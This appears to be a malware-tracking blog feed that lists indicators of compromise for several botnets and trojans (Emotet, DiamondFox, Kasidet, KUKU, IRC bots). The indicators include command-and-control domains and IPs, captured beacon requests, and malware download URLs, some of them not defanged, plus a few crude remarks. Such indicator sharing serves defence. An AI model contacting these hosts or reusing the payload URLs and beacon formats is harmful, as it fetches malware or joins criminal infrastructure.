Tries to steal FTP credentials details “WAREsmartftpclient 2.0settingsbackup” (Indicator: “smartftp”) Sample here. Server : 188.138.40.39:18892 Hosting Infos : http://whois.domaintools.com/188.138.40.39
damcodes777.cc(HTTP Malware Hosted In Russian Federation Moscow Fast Serv Inc.)
damcodes777.cc 86.105.227.124 URL hxxp://damcodes777.cc/b/connect/2 DATA : POST /b/connect/2 HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0(compatible; MSIE 7.0b; Windows NT 6.0) Host: damcodes777.cc Content-Length: 51 Cache-Control: no-cache cs=aW5zZXJ0&p=Windows+XP+32+HOME&m=3107216218&v=3.0 Hosting Infos : http://whois.domaintools.com/86.105.227.124
ptmr1.in(HTTP Botnet Hosted In France Roubaix Ovh Sas)
DNS Requests Request Result ptmr1.in 94.23.104.199 HTTP Command GET /~clientes/i/i.php?frevny=fQ90R444P&bf=KC-FC8&qryn l=855555&irefvba=f6557&hcqngvzr=5 Hosting infos: http://whois.domaintools.com/94.23.104.199
gigasbh.org(IRC Botnet Hosted In France Paris 1&1 Internet Ag)
Domains Domain IP f.eastmoon.pl 148.81.111.101 s.richlab.pl 148.81.111.101 gigasbh.org 82.165.129.253 IRC Traffic >> NICK {USA-XPx86a}cwecttyo >> USER cwectty 7949 7840 :cwectty >> MODE {USA-XPx86a}cwecttyo +iwG >> JOIN #sp yap >> PING 422 MOTD << 332 {USA-XPx86a}cwecttyo #sp : << 333 {USA-XPx86a}cwecttyo #sp x 1436609273 >> PONG 422Read more...
197.85.182.110(Trojan Emotet hosted in South Africa Cape Town Mweb Connect (proprietary) Limited)
Spawned process “cmd.exe” with commandline “/c C:/winclient.au3” (UID: 00009516-00001892) Autoit strings inside maybe this malware is also coded in autoit. Injected into “CCleaner.exe” at 2015-7-2.14:59:47.395 (UID: 00009516-00000996) Contacts very many different hosts “197.85.182.110:8080” “162.144.35.78:8080” “158.255.238.209:8080” “198.1.122.176:8080” “119.59.124.163:8080” “200.159.128.132:8080” “88.208.228.111:8080” “162.144.88.73:8080” “103.245.153.70:8080” “103.228.200.37:8080” POSTs files to a webserver “POST /b215de35/f5665861/ HTTP/1.1 Accept: */* User-Agent: Mozilla/5.0 (compatible;Read more...
upd.upd4ter.com(malware hosted in Spain Madrid Propelin Consulting S.l.u.)
Contacts domains upd.upd4ter.com Contacts server 93.189.33.108:80 In general it steals passwords from browsers and get’s all the informations from the infected machines. GET /installer_stats/?action_id=1003&action_description=Virtual&channel_id=&channel_subid=1&channel_param=0&installer_id=101&installer_version=1.1.9.15182&user_registry=0&user_id=&user_hdd=&user_hdd_volume=&user_mac=&user_mb=&user_bios=&user_os=6.1&user_os_arch=&user_cpu=&user_win_identifier=&process_parent=&user_browsers=&user_default_browser=&user_date=&user_vm=&user_antivirus=s)%20Available.&user_dotnet=&channel=&partner=&aff_id= HTTP/1.1 User-Agent: NSIS_ToolkitOffers (Mozilla) Host: upd.upd4ter.com Cache-Control: no-cache” Sample here Hosting infos http://whois.domaintools.com/93.189.33.108
Gorynych/DiamondFox (hosted in Hungary Budapest Doclerweb Kft)
Thanks to Xylitol for panels and executables. Panels : hxxp://computergraphics.in/ hxxp://my-right.fr/ hxxp://bntnl.com/ Files : PO_37263_pdf.com > bntnl.com/Diamond/Panel/post.php?pl=&slots=1 HTTP/1.1 Xylitol posted a vid with the vulnerability of the Panel. Now the ruski behind this shit updated the panel. Hosting infos : http://whois.domaintools.com/80.77.123.90
KUKU v4.08 beta(Malware hosted in Germany Dortmund 1&1 Internet Ag)
Another version from this malware some domains changed. makemegood24.com 213.165.83.176 1453eea.makemegood24.com 74.208.153.9 aaakemegood24.com 146.148.34.125 ww11.aaakemegood24.com 166.78.106.200 abakemegood24.com 50.21.181.152 acakemegood24.com 74.208.164.166 adakemegood24.com 74.208.153.9 aeakemegood24.com 87.106.20.192 afakemegood24.com perfectchoice1.com 193.166.255.171 1459e2b.perfectchoice1.com 193.166.255.171 All hosts 74.208.164.166 87.106.253.18 54.210.47.225 166.78.106.200 87.106.20.192 213.165.83.176 87.106.250.34 193.166.255.171 URL’S http://1453eea.makemegood24.com/?1453eea=21315306&id=212331279066 GET /?1453eea=21315306&id=212331279066 HTTP/1.1 User-Agent: KUKU v4.08 beta =212331279066 Host: 1453eea.makemegood24.com Cache-Control: no-cache http://perfectchoice1.com/?1459c9a=21339290&id=212331279066 GETRead more...
gohome.cathosting.ninja(IRC botnet hosted in Netherlands Roosendaal Nforce Entertainment B.v.)
Thanks to the anonymous guy who send me the executable. Domains used from the botnet to connect to the server : gohome.cathosting.ninja IRC connection : 188.209.49.76:6667 Files downloaded from the botnet : URL: hxxp://sunnyamk.com/biox.exe URL: hxxp://sunnyamk.com/11111111111111111111111111111111111111111.exe URL: hxxp://sunnyamk.com/qVQLzrpnA7D1X3KwCPse4y00hP6aHIXyiQiyyhlX.exe All Domains : Domain Address Country www.sunnyamk.com 188.209.49.76 Romania sunnyamk.com 188.209.49.76 Romania gohome.cathosting.ninja 188.209.49.76 Romania Samples here.Read more...
jdsiwiqweiqwyreqwi.com (Kasidet aka Neutrino bot)
Thnx to Xylitol for the name of the bot. Contacts domains details “34324325kgkgfkgf.com” “dsffdsk323721372131.com” “fdshjfsh324332432.com” “jdsiwiqweiqwyreqwi.com” Runs shell commands details “cmd /c C:UsersPSPUBWSAppDataLocalTemp243765.bat” “C:38650f5c2beb183eaaba236d1b576c255a9be49af34db85705bed16d23ea11” on 2015-6-6.13:57:14.679 Dropped files details “UserInfo.dll” has type “PE32 executable (DLL) (GUI) Intel 80386, for MS Windows” Read more...